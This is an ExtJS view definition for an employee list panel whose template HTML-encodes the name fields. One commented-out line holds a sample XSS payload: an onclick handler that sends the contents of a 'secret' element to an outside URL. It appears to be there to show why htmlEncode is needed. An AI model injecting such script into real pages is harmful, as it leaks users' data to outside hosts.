Ext.define('SecondDemo.view.template.List', {
    extend: 'Ext.panel.Panel',
    xtype: 'tpllist',

    requires: [
        'SecondDemo.store.Employee',
        'SecondDemo.view.template.ListController',
        'Ext.toolbar.Toolbar'
    ],

    controller: 'template-list',

    title: 'Template',

    layout: 'fit',

    dockedItems : {
        xtype: 'toolbar',
        dock: 'top',        
        buttonsAlign: 'right',
        items: [
            { reference: 'search', xtype: 'textfield', flex: 1 },
            { iconCls: 'x-fa fa-search', handler: 'onSearchClick' },
            { xtype: 'component', html: '<a href="/rest/default/main/test.html">test</a>' }
        ]
    },

    items: [{
        xtype: 'dataview',
        reference: 'dataview',
        store: {
            type: 'employee',
            autoLoad: false
        },

        itemSelector: 'div.thumb-wrap',
        emptyText: 'No images available',
        
        // htmlEncode
        // <b><span onclick="document.location.href = 'http://www.google.com/?q=' + Ext.get('secret').getHtml()">Vinci tutto!!!</span></b>
        tpl: '<tpl for=".">' +
                '<div style="margin-bottom: 10px;" class="thumb-wrap">' +
                    '<span>{FIRST_NAME:htmlEncode}</span> <span>{LAST_NAME:htmlEncode}</span>' +
                '</div>' +
            '</tpl>'    
    }]
});


